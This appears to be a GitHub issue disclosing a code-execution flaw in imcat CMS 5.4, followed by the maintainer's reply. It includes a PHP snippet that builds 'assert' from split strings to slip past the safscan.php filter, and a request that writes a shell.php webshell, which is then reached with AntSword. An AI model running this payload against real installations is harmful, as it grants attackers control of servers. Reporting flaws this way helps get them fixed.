You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur
2. Source code analysis
In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability
3. Reappearance
Use phpstudy to build the environment, and then log in to the background of the website
(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here
(2) Try to write a sentence
Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered
(4) Visit http://127.0.0.1/imcat/index.php?x= fputs(fopen('shell.php','w'),'')
This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse
Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory
As you said: "Perfect the rules of detection (this is hard to implement)":
Good!, These code run before the filter code,
And in the DIY mode, You can remove the filter code too!
But, You can use master branch!
It was disabled by default at in master branch.
Sorry!
The DIY-mode, It was disabled by default only at master branch.
In v5.4, this feature was not update.
1. Overview
Official website: http://txjia.com/imcat/
Version: imcat-5.4
Vulnerability type: Code Execution
Source code: https://github.com/peacexie/imcat/releases/tag/v5.4
PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur
2. Source code analysis
In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability
data:image/s3,"s3://crabby-images/bdc15/bdc15ac9a1f5da1552fbd213b85377b5e2184d4b" alt="image"
3. Reappearance
Use phpstudy to build the environment, and then log in to the background of the website
(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here
data:image/s3,"s3://crabby-images/bf90e/bf90e9cfbdf77efaf1aa9ca8c558c30f207257bd" alt="image"
(2) Try to write a sentence
data:image/s3,"s3://crabby-images/3297b/3297bc4e177ff62919fb133be5653f6ffb4316b1" alt="image"
data:image/s3,"s3://crabby-images/b1dd6/b1dd6f93da4f0c707191b7e754c1a455c0e52917" alt="image"
Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered
(3) Try to write
data:image/s3,"s3://crabby-images/95370/953706027ab3c5d40357950d6cfe1aa2cc48bb05" alt="image"
data:image/s3,"s3://crabby-images/1100b/1100b1eddf8bf2f7d0bc8c92eff5f71f743dbacd" alt="image"
$ch = explode(".","hello.ass.world.er.t");
$c = $ch[1].$ch[3].$ch[4]; //assert
$d=$_GET['x'];
$c($d);
Successfully bypassed
(4) Visit
data:image/s3,"s3://crabby-images/31631/316317e0997a4d550d222ad927f010f0d49bfd5a" alt="image"
http://127.0.0.1/imcat/index.php?x= fputs(fopen('shell.php','w'),'')
This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse
Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory
(5) Use ant sword to connect
http://127.0.0.1/imcat/shell.php
data:image/s3,"s3://crabby-images/d6ef9/d6ef99b3dc2c3693510f95d5c5822b904feaf6bf" alt="image"
data:image/s3,"s3://crabby-images/fab38/fab38862cfbade38ed7b1aae008a6c528ca701a8" alt="image"
4. Repair service suggestions
(1) Turn off the function of modifying the source code in the background
(2) Perfect the rules of detection (this is hard to implement)
The text was updated successfully, but these errors were encountered: